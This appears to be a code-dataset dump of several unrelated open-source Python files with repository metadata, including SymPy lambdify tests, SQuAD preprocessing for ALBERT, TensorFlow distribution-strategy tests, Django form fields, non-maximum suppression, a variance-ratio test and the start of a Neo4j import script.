f2 = uppergamma(a, x)
F = lambdify((a, x), f2, modules='scipy')
assert abs(uppergamma(1, 3) - F(1, 3)) <= 1e-10
def test_fresnel_integrals_scipy():
if not scipy:
skip("scipy not installed")
f1 = fresnelc(x)
f2 = fresnels(x)
F1 = lambdify(x, f1, modules='scipy')
F2 = lambdify(x, f2, modules='scipy')
assert abs(fresnelc(1.3) - F1(1.3)) <= 1e-10
assert abs(fresnels(1.3) - F2(1.3)) <= 1e-10
def test_beta_scipy():
if not scipy:
skip("scipy not installed")
f = beta(x, y)
F = lambdify((x, y), f, modules='scipy')
assert abs(beta(1.3, 2.3) - F(1.3, 2.3)) <= 1e-10
def test_beta_math():
f = beta(x, y)
F = lambdify((x, y), f, modules='math')
assert abs(beta(1.3, 2.3) - F(1.3, 2.3)) <= 1e-10
def test_betainc_scipy():
if not scipy:
skip("scipy not installed")
f = betainc(w, x, y, z)
F = lambdify((w, x, y, z), f, modules='scipy')
assert abs(betainc(1.4, 3.1, 0.1, 0.5) - F(1.4, 3.1, 0.1, 0.5)) <= 1e-10
def test_betainc_regularized_scipy():
if not scipy:
skip("scipy not installed")
f = betainc_regularized(w, x, y, z)
F = lambdify((w, x, y, z), f, modules='scipy')
assert abs(betainc_regularized(0.2, 3.5, 0.1, 1) - F(0.2, 3.5, 0.1, 1)) <= 1e-10
def test_numpy_special_math():
if not numpy:
skip("numpy not installed")
funcs = [expm1, log1p, exp2, log2, log10, hypot, logaddexp, logaddexp2]
for func in funcs:
if 2 in func.nargs:
expr = func(x, y)
args = (x, y)
num_args = (0.3, 0.4)
elif 1 in func.nargs:
expr = func(x)
args = (x,)
num_args = (0.3,)
else:
raise NotImplementedError("Need to handle other than unary & binary functions in test")
f = lambdify(args, expr)
result = f(*num_args)
reference = expr.subs(dict(zip(args, num_args))).evalf()
assert numpy.allclose(result, float(reference))
lae2 = lambdify((x, y), logaddexp2(log2(x), log2(y)))
assert abs(2.0**lae2(1e-50, 2.5e-50) - 3.5e-50) < 1e-62 # from NumPy's docstring
def test_scipy_special_math():
if not scipy:
skip("scipy not installed")
cm1 = lambdify((x,), cosm1(x), modules='scipy')
assert abs(cm1(1e-20) + 5e-41) < 1e-200
def test_cupy_array_arg():
if not cupy:
skip("CuPy not installed")
f = lambdify([[x, y]], x*x + y, 'cupy')
result = f(cupy.array([2.0, 1.0]))
assert result == 5
assert "cupy" in str(type(result))
def test_cupy_array_arg_using_numpy():
# numpy functions can be run on cupy arrays
# unclear if we can "officialy" support this,
# depends on numpy __array_function__ support
if not cupy:
skip("CuPy not installed")
f = lambdify([[x, y]], x*x + y, 'numpy')
result = f(cupy.array([2.0, 1.0]))
assert result == 5
assert "cupy" in str(type(result))
def test_cupy_dotproduct():
if not cupy:
skip("CuPy not installed")
A = Matrix([x, y, z])
f1 = lambdify([x, y, z], DotProduct(A, A), modules='cupy')
f2 = lambdify([x, y, z], DotProduct(A, A.T), modules='cupy')
f3 = lambdify([x, y, z], DotProduct(A.T, A), modules='cupy')
f4 = lambdify([x, y, z], DotProduct(A, A.T), modules='cupy')
assert f1(1, 2, 3) == \
f2(1, 2, 3) == \
f3(1, 2, 3) == \
f4(1, 2, 3) == \
cupy.array([14])
| 31.926899
| 130
| 0.588063
|
de4888d07625e7a318f4bb439819f8c978f615c6
| 12,530
|
py
|
Python
|
research/nlp/albert/src/create_squad_data.py
|
mindspore-ai/models
|
9127b128e2961fd698977e918861dadfad00a44c
|
[
"Apache-2.0"
] | 77
|
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
research/nlp/albert/src/create_squad_data.py
|
mindspore-ai/models
|
9127b128e2961fd698977e918861dadfad00a44c
|
[
"Apache-2.0"
] | 3
|
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
research/nlp/albert/src/create_squad_data.py
|
mindspore-ai/models
|
9127b128e2961fd698977e918861dadfad00a44c
|
[
"Apache-2.0"
] | 24
|
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""create squad data"""
import collections
import json
from src import tokenization
class SquadExample():
"""extract column contents from raw data"""
def __init__(self,
qas_id,
question_text,
doc_tokens,
orig_answer_text=None,
start_position=None,
end_position=None,
is_impossible=False):
self.qas_id = qas_id
self.question_text = question_text
self.doc_tokens = doc_tokens
self.orig_answer_text = orig_answer_text
self.start_position = start_position
self.end_position = end_position
self.is_impossible = is_impossible
class InputFeatures():
"""A single set of features of data."""
def __init__(self,
unique_id,
example_index,
doc_span_index,
tokens,
token_to_orig_map,
token_is_max_context,
input_ids,
input_mask,
segment_ids,
start_position=None,
end_position=None,
is_impossible=None):
self.unique_id = unique_id
self.example_index = example_index
self.doc_span_index = doc_span_index
self.tokens = tokens
self.token_to_orig_map = token_to_orig_map
self.token_is_max_context = token_is_max_context
self.input_ids = input_ids
self.input_mask = input_mask
self.segment_ids = segment_ids
self.start_position = start_position
self.end_position = end_position
self.is_impossible = is_impossible
def read_squad_examples(input_file, is_training, version_2_with_negative=False):
"""Return list of SquadExample from input_data or input_file (SQuAD json file)"""
with open(input_file, "r") as reader:
input_data = json.load(reader)["data"]
def is_whitespace(c):
if c == " " or c == "\t" or c == "\r" or c == "\n" or ord(c) == 0x202F:
return True
return False
def token_offset(text):
doc_tokens = []
char_to_word_offset = []
prev_is_whitespace = True
        for c in text:
if is_whitespace(c):
prev_is_whitespace = True
else:
if prev_is_whitespace:
doc_tokens.append(c)
else:
doc_tokens[-1] += c
prev_is_whitespace = False
char_to_word_offset.append(len(doc_tokens) - 1)
return (doc_tokens, char_to_word_offset)
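    # Illustrative example (added for clarity, not part of the original data flow):
    # token_offset("a b  c") returns (['a', 'b', 'c'], [0, 0, 1, 1, 1, 2]) --
    # doc_tokens holds the whitespace-delimited tokens, and char_to_word_offset
    # maps every character position (including whitespace) to the index of the
    # token it belongs to, which is later used to locate answer spans.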
def process_one_example(qa, is_training, version_2_with_negative, doc_tokens, char_to_word_offset):
qas_id = qa["id"]
question_text = qa["question"]
start_position = -1
end_position = -1
orig_answer_text = ""
is_impossible = False
if is_training:
if version_2_with_negative:
is_impossible = qa["is_impossible"]
if (len(qa["answers"]) != 1) and (not is_impossible):
raise ValueError("For training, each question should have exactly 1 answer.")
if not is_impossible:
answer = qa["answers"][0]
orig_answer_text = answer["text"]
answer_offset = answer["answer_start"]
answer_length = len(orig_answer_text)
start_position = char_to_word_offset[answer_offset]
end_position = char_to_word_offset[answer_offset + answer_length - 1]
actual_text = " ".join(doc_tokens[start_position:(end_position + 1)])
cleaned_answer_text = " ".join(tokenization.whitespace_tokenize(orig_answer_text))
if actual_text.find(cleaned_answer_text) == -1:
return None
example = SquadExample(
qas_id=qas_id,
question_text=question_text,
doc_tokens=doc_tokens,
orig_answer_text=orig_answer_text,
start_position=start_position,
end_position=end_position,
is_impossible=is_impossible)
return example
examples = []
for entry in input_data:
for paragraph in entry["paragraphs"]:
paragraph_text = paragraph["context"]
doc_tokens, char_to_word_offset = token_offset(paragraph_text)
for qa in paragraph["qas"]:
one_example = process_one_example(qa, is_training, version_2_with_negative,
doc_tokens, char_to_word_offset)
if one_example is not None:
examples.append(one_example)
return examples
def _check_is_max_context(doc_spans, cur_span_index, position):
"""Check if this is the 'max context' doc span for the token."""
best_score = None
best_span_index = None
for (span_index, doc_span) in enumerate(doc_spans):
end = doc_span.start + doc_span.length - 1
if position < doc_span.start:
continue
if position > end:
continue
num_left_context = position - doc_span.start
num_right_context = end - position
score = min(num_left_context, num_right_context) + 0.01 * doc_span.length
if best_score is None or score > best_score:
best_score = score
best_span_index = span_index
return cur_span_index == best_span_index
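# Worked example for _check_is_max_context (illustrative): with
# doc_spans = [DocSpan(start=0, length=6), DocSpan(start=4, length=6)] and
# position=5, span 0 scores min(5, 0) + 0.01*6 = 0.06 while span 1 scores
# min(1, 4) + 0.01*6 = 1.06, so span 1 is the "max context" span for that
# token -- the span in which the token has the most surrounding context.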
def _improve_answer_span(doc_tokens, input_start, input_end, tokenizer,
orig_answer_text):
"""Returns tokenized answer spans that better match the annotated answer."""
tok_answer_text = " ".join(tokenizer.tokenize(orig_answer_text))
for new_start in range(input_start, input_end + 1):
for new_end in range(input_end, new_start - 1, -1):
text_span = " ".join(doc_tokens[new_start:(new_end + 1)])
if text_span == tok_answer_text:
return (new_start, new_end)
return (input_start, input_end)
def convert_examples_to_features(examples, tokenizer, max_seq_length, doc_stride,
max_query_length, is_training, output_fn, vocab_file):
"""Loads a data file into a list of `InputBatch`s."""
unique_id = 1000000000
output = []
for (example_index, example) in enumerate(examples):
query_tokens = tokenizer.tokenize(example.question_text)
if len(query_tokens) > max_query_length:
query_tokens = query_tokens[0:max_query_length]
tok_to_orig_index = []
orig_to_tok_index = []
all_doc_tokens = []
for (i, token) in enumerate(example.doc_tokens):
orig_to_tok_index.append(len(all_doc_tokens))
sub_tokens = tokenizer.tokenize(token)
for sub_token in sub_tokens:
tok_to_orig_index.append(i)
all_doc_tokens.append(sub_token)
tok_start_position = None
tok_end_position = None
if is_training and example.is_impossible:
tok_start_position = -1
tok_end_position = -1
if is_training and not example.is_impossible:
tok_start_position = orig_to_tok_index[example.start_position]
if example.end_position < len(example.doc_tokens) - 1:
tok_end_position = orig_to_tok_index[example.end_position + 1] - 1
else:
tok_end_position = len(all_doc_tokens) - 1
(tok_start_position, tok_end_position) = _improve_answer_span(
all_doc_tokens, tok_start_position, tok_end_position, tokenizer,
example.orig_answer_text)
# The -3 accounts for [CLS], [SEP] and [SEP]
max_tokens_for_doc = max_seq_length - len(query_tokens) - 3
# We can have documents that are longer than the maximum sequence length.
# To deal with this we do a sliding window approach, where we take chunks
# of the up to our max length with a stride of `doc_stride`.
_DocSpan = collections.namedtuple("DocSpan", ["start", "length"])
doc_spans = []
start_offset = 0
while start_offset < len(all_doc_tokens):
length = len(all_doc_tokens) - start_offset
if length > max_tokens_for_doc:
length = max_tokens_for_doc
doc_spans.append(_DocSpan(start=start_offset, length=length))
if start_offset + length == len(all_doc_tokens):
break
start_offset += min(length, doc_stride)
for (doc_span_index, doc_span) in enumerate(doc_spans):
tokens = []
token_to_orig_map = {}
token_is_max_context = {}
segment_ids = []
tokens.append("[CLS]")
segment_ids.append(0)
for token in query_tokens:
tokens.append(token)
segment_ids.append(0)
tokens.append("[SEP]")
segment_ids.append(0)
for i in range(doc_span.length):
split_token_index = doc_span.start + i
token_to_orig_map[len(tokens)] = tok_to_orig_index[split_token_index]
is_max_context = _check_is_max_context(doc_spans, doc_span_index, split_token_index)
token_is_max_context[len(tokens)] = is_max_context
tokens.append(all_doc_tokens[split_token_index])
segment_ids.append(1)
tokens.append("[SEP]")
segment_ids.append(1)
input_ids = tokenizer.convert_tokens_to_ids(tokens)
# The mask has 1 for real tokens and 0 for padding tokens. Only real
# tokens are attended to.
input_mask = [1] * len(input_ids)
# Zero-pad up to the sequence length.
while len(input_ids) < max_seq_length:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
assert len(input_ids) == max_seq_length
assert len(input_mask) == max_seq_length
assert len(segment_ids) == max_seq_length
start_position = None
end_position = None
if is_training and not example.is_impossible:
# For training, if our document chunk does not contain an annotation
# we throw it out, since there is nothing to predict.
doc_start = doc_span.start
doc_end = doc_span.start + doc_span.length - 1
out_of_span = False
if not (tok_start_position >= doc_start and tok_end_position <= doc_end):
out_of_span = True
if out_of_span:
start_position = 0
end_position = 0
else:
doc_offset = len(query_tokens) + 2
start_position = tok_start_position - doc_start + doc_offset
end_position = tok_end_position - doc_start + doc_offset
if is_training and example.is_impossible:
start_position = 0
end_position = 0
feature = InputFeatures(
unique_id=unique_id,
example_index=example_index,
doc_span_index=doc_span_index,
tokens=tokens,
token_to_orig_map=token_to_orig_map,
token_is_max_context=token_is_max_context,
input_ids=input_ids,
input_mask=input_mask,
segment_ids=segment_ids,
start_position=start_position,
end_position=end_position,
is_impossible=example.is_impossible)
# Run callback
output.append(feature)
unique_id += 1
return output
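# Worked example of the sliding-window split above (illustrative only): with
# max_tokens_for_doc=100 and doc_stride=50, a 230-token document produces the
# DocSpans (start=0, length=100), (50, 100), (100, 100) and (150, 80), so
# consecutive windows overlap by 50 tokens and every token appears in at least
# one span.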
| 40.160256
| 103
| 0.600878
|
1208615e7f48308c5d7649e79fa6d0e78606a5ad
| 2,427
|
py
|
Python
|
dudley/test/python/linearElastic.py
|
markendr/esys-escript.github.io
|
0023eab09cd71f830ab098cb3a468e6139191e8d
|
[
"Apache-2.0"
] | null | null | null |
dudley/test/python/linearElastic.py
|
markendr/esys-escript.github.io
|
0023eab09cd71f830ab098cb3a468e6139191e8d
|
[
"Apache-2.0"
] | 1
|
2019-01-14T03:07:43.000Z
|
2019-01-14T03:07:43.000Z
|
dudley/test/python/linearElastic.py
|
markendr/esys-escript.github.io
|
0023eab09cd71f830ab098cb3a468e6139191e8d
|
[
"Apache-2.0"
] | null | null | null |
##############################################################################
#
# Copyright (c) 2003-2018 by The University of Queensland
# http://www.uq.edu.au
#
# Primary Business: Queensland, Australia
# Licensed under the Apache License, version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
#
# Development until 2012 by Earth Systems Science Computational Center (ESSCC)
# Development 2012-2013 by School of Earth Sciences
# Development from 2014 by Centre for Geoscience Computing (GeoComp)
#
##############################################################################
from __future__ import print_function, division
__copyright__="""Copyright (c) 2003-2018 by The University of Queensland
http://www.uq.edu.au
Primary Business: Queensland, Australia"""
__license__="""Licensed under the Apache License, version 2.0
http://www.apache.org/licenses/LICENSE-2.0"""
__url__="https://launchpad.net/escript-finley"
from esys.escript import *
from esys.escript.linearPDEs import LinearPDE
import esys.dudley as dudley
from esys.weipa import saveVTK
press0=1.
lamb=1.
nu=0.3
# this sets the Hooke tensor:
def setHookTensor(w,l,n):
C=Tensor4(0.,w)
for i in range(w.getDim()):
for j in range(w.getDim()):
C[i,i,j,j]+=l
C[j,i,j,i]+=n
C[j,i,i,j]+=n
return C
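# Note (added): the loops above build the isotropic Hooke tensor
# C[a,b,c,d] = l*delta_ab*delta_cd + n*(delta_ac*delta_bd + delta_ad*delta_bc),
# i.e. l plays the role of the first Lame parameter and n that of the shear
# modulus, even though the script names the second constant "nu".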
# generate mesh: here a 10x20 mesh of order 1
domain=dudley.Rectangle(10,20,1,l0=0.5,l1=1.0)
# get handel to nodes and elements:
e=Function(domain)
fe=FunctionOnBoundary(domain)
n=ContinuousFunction(domain)
#
# set a mask msk of type vector which is one for nodes and components set by a constraint:
#
msk=whereZero(n.getX()[0])*[1.,1.]
#
# set the normal stress components on face elements.
# faces tagged with 21 get the normal stress [0,-press0].
#
# now the pressure is set to zero for x0 coordinates bigger than 0.1
press=whereNegative(fe.getX()[0]-0.1)*200000.*[1.,0.]
# assemble the linear system:
mypde=LinearPDE(domain)
mypde.setValue(A=setHookTensor(e,lamb,nu),y=press,q=msk,r=[0,0])
mypde.setSymmetryOn()
mypde.getSolverOptions().setVerbosityOn()
mypde.getSolverOptions().setPreconditioner(mypde.getSolverOptions().AMG)
# solve for the displacements:
u_d=mypde.getSolution()
# get the gradient and calculate the stress:
g=grad(u_d)
stress=lamb*trace(g)*kronecker(domain)+nu*(g+transpose(g))
# write the hydrostatic pressure:
saveVTK("result.vtu",displacement=u_d,pressure=trace(stress)/domain.getDim())
| 32.36
| 90
| 0.691389
|
0e6f81df1f9f78d88c4e102dad94e94a29ac4e76
| 5,283
|
py
|
Python
|
tensorflow/python/distribute/one_device_strategy_test.py
|
joshz123/tensorflow
|
7841ca029060ab78e221e757d4b1ee6e3e0ffaa4
|
[
"Apache-2.0"
] | 78
|
2020-08-04T12:36:25.000Z
|
2022-03-25T04:23:40.000Z
|
tensorflow/python/distribute/one_device_strategy_test.py
|
joshz123/tensorflow
|
7841ca029060ab78e221e757d4b1ee6e3e0ffaa4
|
[
"Apache-2.0"
] | 203
|
2019-06-14T23:53:10.000Z
|
2022-02-10T02:27:23.000Z
|
tensorflow/python/distribute/one_device_strategy_test.py
|
joshz123/tensorflow
|
7841ca029060ab78e221e757d4b1ee6e3e0ffaa4
|
[
"Apache-2.0"
] | 28
|
2020-02-10T07:03:06.000Z
|
2022-01-12T11:19:20.000Z
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for class OneDeviceStrategy."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python import tf2
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import strategy_combinations
from tensorflow.python.distribute import strategy_test_lib
from tensorflow.python.eager import context
from tensorflow.python.eager import test
@combinations.generate(
combinations.combine(
distribution=[
strategy_combinations.one_device_strategy,
strategy_combinations.one_device_strategy_gpu
],
mode=["eager", "graph"]))
class OneDeviceStrategyTest(
strategy_test_lib.DistributionTestBase,
strategy_test_lib.OneDeviceDistributionTestBase):
def testMinimizeLoss(self, distribution):
if context.executing_eagerly():
self._test_minimize_loss_eager(distribution)
else:
self._test_minimize_loss_graph(distribution)
def testReplicaId(self, distribution):
self._test_replica_id(distribution)
def testCallAndMergeExceptions(self, distribution):
self._test_call_and_merge_exceptions(distribution)
def testReplicateDataset(self, distribution):
if tf2.enabled() and not context.executing_eagerly():
self.skipTest("Skipping test since we do not support graph mode in TF 2")
dataset_fn = lambda: dataset_ops.Dataset.range(10)
expected_values = [[i] for i in range(10)]
input_fn = self._input_fn_to_test_input_context(
dataset_fn,
expected_num_replicas_in_sync=1,
expected_num_input_pipelines=1,
expected_input_pipeline_id=0)
self._test_input_fn_iterable(distribution, input_fn, expected_values)
def testMakeInputFnIteratorWithDataset(self, distribution):
dataset_fn = lambda: dataset_ops.Dataset.range(10)
expected_values = [[i] for i in range(10)]
input_fn = self._input_fn_to_test_input_context(
dataset_fn,
expected_num_replicas_in_sync=1,
expected_num_input_pipelines=1,
expected_input_pipeline_id=0)
iterator = distribution.make_input_fn_iterator(input_fn)
self._test_input_fn_iterator(
iterator, distribution.extended.worker_devices, expected_values)
def testMakeInputFnIteratorWithCallable(self, distribution):
def fn():
dataset = dataset_ops.Dataset.range(10)
it = dataset_ops.make_one_shot_iterator(dataset)
return it.get_next
expected_values = [[i] for i in range(10)]
input_fn = self._input_fn_to_test_input_context(
fn,
expected_num_replicas_in_sync=1,
expected_num_input_pipelines=1,
expected_input_pipeline_id=0)
iterator = distribution.make_input_fn_iterator(input_fn)
self._test_input_fn_iterator(
iterator, distribution.extended.worker_devices, expected_values,
test_reinitialize=False, ignore_order=True)
def testNumpyDataset(self, distribution):
self._test_numpy_dataset(distribution)
def testRun(self, distribution):
self._test_run(distribution)
def testAllReduceSum(self, distribution):
self._test_all_reduce_sum(distribution)
def testAllReduceSumGradients(self, distribution):
self._test_all_reduce_sum_gradients(distribution)
def testAllReduceSumGradientTape(self, distribution):
self._test_all_reduce_sum_gradient_tape(distribution)
def testAllReduceMean(self, distribution):
self._test_all_reduce_mean(distribution)
def testAllReduceMeanGradients(self, distribution):
self._test_all_reduce_mean_gradients(distribution)
def testAllReduceMeanGradientTape(self, distribution):
self._test_all_reduce_mean_gradient_tape(distribution)
def testTrainableVariables(self, distribution):
self._test_trainable_variable(distribution)
@combinations.generate(
combinations.combine(
distribution=[
strategy_combinations.one_device_strategy_on_worker_1,
strategy_combinations.one_device_strategy_gpu_on_worker_1
],
mode=["eager", "graph"]))
class OneDeviceStrategyOnRemoteWorkerTest(
strategy_test_lib.DistributionTestBase,
strategy_test_lib.OneDeviceDistributionTestBase):
def testDeviceAndInputDeviceAreColocated(self, distribution):
self._test_device_and_input_device_are_colocated(distribution)
def testDeviceAndInputDeviceAreColocatedWithFunction(self, distribution):
self._test_device_and_input_device_are_colocated_with_function(distribution)
if __name__ == "__main__":
test.main()
| 37.735714
| 80
| 0.765474
|
360dbedb2d31808c31c0eb2d2114b6d543e4f46f
| 1,920
|
py
|
Python
|
localflavor/au/forms.py
|
ifanrx/django-localflavor
|
38328bbb127a33cb06eaea82288cd70821b2bad6
|
[
"BSD-3-Clause"
] | null | null | null |
localflavor/au/forms.py
|
ifanrx/django-localflavor
|
38328bbb127a33cb06eaea82288cd70821b2bad6
|
[
"BSD-3-Clause"
] | null | null | null |
localflavor/au/forms.py
|
ifanrx/django-localflavor
|
38328bbb127a33cb06eaea82288cd70821b2bad6
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Australian-specific Form helpers
"""
from __future__ import absolute_import, unicode_literals
import re
from django.core.validators import EMPTY_VALUES
from django.forms import ValidationError
from django.forms.fields import CharField, RegexField, Select
from django.utils.encoding import smart_text
from django.utils.translation import ugettext_lazy as _
from .au_states import STATE_CHOICES
PHONE_DIGITS_RE = re.compile(r'^(\d{10})$')
class AUPostCodeField(RegexField):
""" Australian post code field.
Assumed to be 4 digits.
Northern Territory 3-digit postcodes should have leading zero.
"""
default_error_messages = {
'invalid': _('Enter a 4 digit postcode.'),
}
def __init__(self, max_length=4, min_length=None, *args, **kwargs):
super(AUPostCodeField, self).__init__(r'^\d{4}$',
max_length, min_length, *args, **kwargs)
class AUPhoneNumberField(CharField):
"""
A form field that validates input as an Australian phone number.
Valid numbers have ten digits.
"""
default_error_messages = {
'invalid': 'Phone numbers must contain 10 digits.',
}
def clean(self, value):
"""
Validate a phone number. Strips parentheses, whitespace and hyphens.
"""
super(AUPhoneNumberField, self).clean(value)
if value in EMPTY_VALUES:
return ''
        value = re.sub(r'(\(|\)|\s+|-)', '', smart_text(value))
phone_match = PHONE_DIGITS_RE.search(value)
if phone_match:
return '%s' % phone_match.group(1)
raise ValidationError(self.error_messages['invalid'])
class AUStateSelect(Select):
"""
A Select widget that uses a list of Australian states/territories as its
choices.
"""
def __init__(self, attrs=None):
super(AUStateSelect, self).__init__(attrs, choices=STATE_CHOICES)
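# Illustrative behaviour (added, not part of the original module): assuming a
# configured Django settings module, AUPhoneNumberField().clean('(02) 9876-5432')
# strips the parentheses, space and hyphen and returns '0298765432', while any
# value that does not reduce to exactly ten digits raises ValidationError.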
| 29.090909
| 86
| 0.665104
|
50611c0f84ac3e8a5c3d2e811566ef36578654e5
| 398
|
py
|
Python
|
service/config.py
|
gmarciani/flasky
|
f97c5c7201c2789834a422cf90bde09cf4b78cc8
|
[
"MIT"
] | 2
|
2021-03-06T11:05:43.000Z
|
2021-05-23T14:55:53.000Z
|
service/config.py
|
gmarciani/flasky
|
f97c5c7201c2789834a422cf90bde09cf4b78cc8
|
[
"MIT"
] | null | null | null |
service/config.py
|
gmarciani/flasky
|
f97c5c7201c2789834a422cf90bde09cf4b78cc8
|
[
"MIT"
] | null | null | null |
"""
Configurations for the service 'Latency'.
"""
class Default:
"""
Default configuration.
"""
DEBUG = True
LOG_LEVEL = "INFO"
APP_HOST = "localhost"
APP_PORT = 8000
class Debug(Default):
"""
Debug configuration.
"""
DEBUG = True
LOG_LEVEL = "DEBUG"
class Production(Default):
"""
Production configuration.
"""
DEBUG = False
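# Minimal usage sketch (added; assumes a Flask application object and that this
# module is importable as 'service.config'):
#
#     from flask import Flask
#     app = Flask(__name__)
#     app.config.from_object('service.config.Production')
#     app.run(host=app.config['APP_HOST'], port=app.config['APP_PORT'])
#
# Flask's from_object copies the upper-case class attributes, including those
# inherited from Default, into app.config.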
| 12.83871
| 41
| 0.577889
|
78e852d5705c1df2d4f0ced019694cf6dc1a496b
| 1,059
|
py
|
Python
|
lib/nms/py_cpu_nms.py
|
huan123/py-fatser-rcnn
|
b0c02e004bcd480a01671603578fe18740b85ac0
|
[
"MIT"
] | null | null | null |
lib/nms/py_cpu_nms.py
|
huan123/py-fatser-rcnn
|
b0c02e004bcd480a01671603578fe18740b85ac0
|
[
"MIT"
] | null | null | null |
lib/nms/py_cpu_nms.py
|
huan123/py-fatser-rcnn
|
b0c02e004bcd480a01671603578fe18740b85ac0
|
[
"MIT"
] | null | null | null |
# --------------------------------------------------------
# Fast R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick
# --------------------------------------------------------
# Non-maximum suppression (NMS)
import numpy as np
def py_cpu_nms(dets, thresh):
"""Pure Python NMS baseline."""
x1 = dets[:, 0]
y1 = dets[:, 1]
x2 = dets[:, 2]
y2 = dets[:, 3]
scores = dets[:, 4]
areas = (x2 - x1 + 1) * (y2 - y1 + 1)
order = scores.argsort()[::-1]
keep = []
while order.size > 0:
i = order[0]
keep.append(i)
xx1 = np.maximum(x1[i], x1[order[1:]])
yy1 = np.maximum(y1[i], y1[order[1:]])
xx2 = np.minimum(x2[i], x2[order[1:]])
yy2 = np.minimum(y2[i], y2[order[1:]])
w = np.maximum(0.0, xx2 - xx1 + 1)
h = np.maximum(0.0, yy2 - yy1 + 1)
inter = w * h
ovr = inter / (areas[i] + areas[order[1:]] - inter)
inds = np.where(ovr <= thresh)[0]
order = order[inds + 1]
return keep
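# Minimal self-check (added for illustration; not part of the original Fast R-CNN
# code). Three boxes: the first two overlap heavily, the third is far away, so
# with an IoU threshold of 0.5 only boxes 0 and 2 survive suppression.
if __name__ == '__main__':
    example_dets = np.array([[0., 0., 10., 10., 0.9],
                             [1., 1., 11., 11., 0.8],
                             [50., 50., 60., 60., 0.7]])
    print(py_cpu_nms(example_dets, 0.5))  # expected output: [0, 2]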
| 27.153846
| 59
| 0.459868
|
6f2cca215a10937a4bd949ee968a9936782ba77b
| 1,401
|
py
|
Python
|
Test.py
|
AleksiusK/Market-efficiency
|
10d802f56c6e61a8c8b1eff116b7633cc9f32fdc
|
[
"MIT"
] | null | null | null |
Test.py
|
AleksiusK/Market-efficiency
|
10d802f56c6e61a8c8b1eff116b7633cc9f32fdc
|
[
"MIT"
] | null | null | null |
Test.py
|
AleksiusK/Market-efficiency
|
10d802f56c6e61a8c8b1eff116b7633cc9f32fdc
|
[
"MIT"
] | null | null | null |
import numpy as np
import pandas as pd
import Calculations as Ca
from pprint import pprint
# Variance ratio test for market efficiency by Lo MacKinlay (1988)
# Aleksius Kurkela
# kurkela.aleksius@gmail.com
def estimate(data, lags):
"""
:param data: Data frame of prices [p1, p2, p3 ... pt] with the label "Price" as header
    :param lags: List of integer lags to evaluate the variance ratio at
    :return: List of dicts, one per lag, with keys 'Homoscedasticity', 'Heteroscedasticity', 'Variance Ratio' and 'k='
"""
TargetPrices = data['Price'].to_numpy(dtype=np.float64)
TestResult = []
k = 0
while k < len(lags):
vr, res1, res2 = Ca.VR(np.log(TargetPrices), int(lags[k]))
        TestResult.append({
            'Homoscedasticity': res1,
            'Heteroscedasticity': res2,
            'Variance Ratio': vr,
            'k=': lags[k]
        })
k += 1
return TestResult
def main():
# Create random prices
np.random.seed(13)
steps = np.random.normal(0, 1, size=100000)
steps[0] = 0
P = 10000 + np.cumsum(steps)
data = pd.DataFrame(P, columns=['Price'])
lags = []
k = int(input("Input the amount of lags wanted: "))
n = 0
while n < k:
lag = input("Set lag: ")
if lag == "/s":
break
lags.append(lag)
n += 1
result = estimate(data, lags)
pprint(result)
main()
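# Background note (added): the Lo-MacKinlay variance ratio for lag k is
# VR(k) = Var[r_t + ... + r_{t-k+1}] / (k * Var[r_t]), the variance of k-period
# log returns divided by k times the variance of one-period log returns. Under
# a random walk VR(k) is approximately 1 for every k, which is what the
# homoscedasticity- and heteroscedasticity-consistent statistics returned by
# Ca.VR are presumably testing against.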
| 25.472727
| 116
| 0.596717
|
5e8babe9b9c59e60ab90dc88932328eb9f5347ed
| 16,649
|
py
|
Python
|
subcommands/store_in_neo4j.py
|
brunomateus/open_source_android_apps
|
143deea78ff125b4dd5e88b89f48dc3a9e8bcdfa
|
[
"MIT"
] | 2
|
2019-11-18T18:01:27.000Z
|
2021-05-13T18:16:17.000Z
|
subcommands/store_in_neo4j.py
|
brunomateus/open_source_android_apps
|
143deea78ff125b4dd5e88b89f48dc3a9e8bcdfa
|
[
"MIT"
] | null | null | null |
subcommands/store_in_neo4j.py
|
brunomateus/open_source_android_apps
|
143deea78ff125b4dd5e88b89f48dc3a9e8bcdfa
|
[
"MIT"
] | 3
|
2019-07-18T19:33:04.000Z
|
2021-01-13T21:13:29.000Z
|
"""Store information in Neo4j graph database.
Use -h or --help for more information.
"""
import argparse
import csv
import logging
import os
from typing import Dict, IO, List
from util.neo4j import Neo4j, Node
from util.parse import \
parse_google_play_info, \
parse_iso8601
__log__ = logging.getLogger(__name__)
NEO4J_HOST = 'bolt://localhost'
NEO4J_PORT = 7687
GITLAB_HOST = 'http://145.108.225.21'
GITLAB_REPOSITORY_PATH = '/var/opt/gitlab/git-data/repositories/gitlab'
def add_google_play_page_node(
package_name: str, neo4j: Neo4j, play_details_dir: str) -> Node:
"""Create a node for an Google Play page.
Meta data of Google Play page is loaded from JSON file at
<play_details_dir>/<package_name>.json
:param str package_name:
Package name.
:param Neo4j neo4j:
Neo4j instance to add nodes to.
:param str play_details_dir:
Name of directory to include JSON files from. Filenames in this
directory need to have .json extension. Filename without extension is
assumed to be package name for details contained in file.
:return Node:
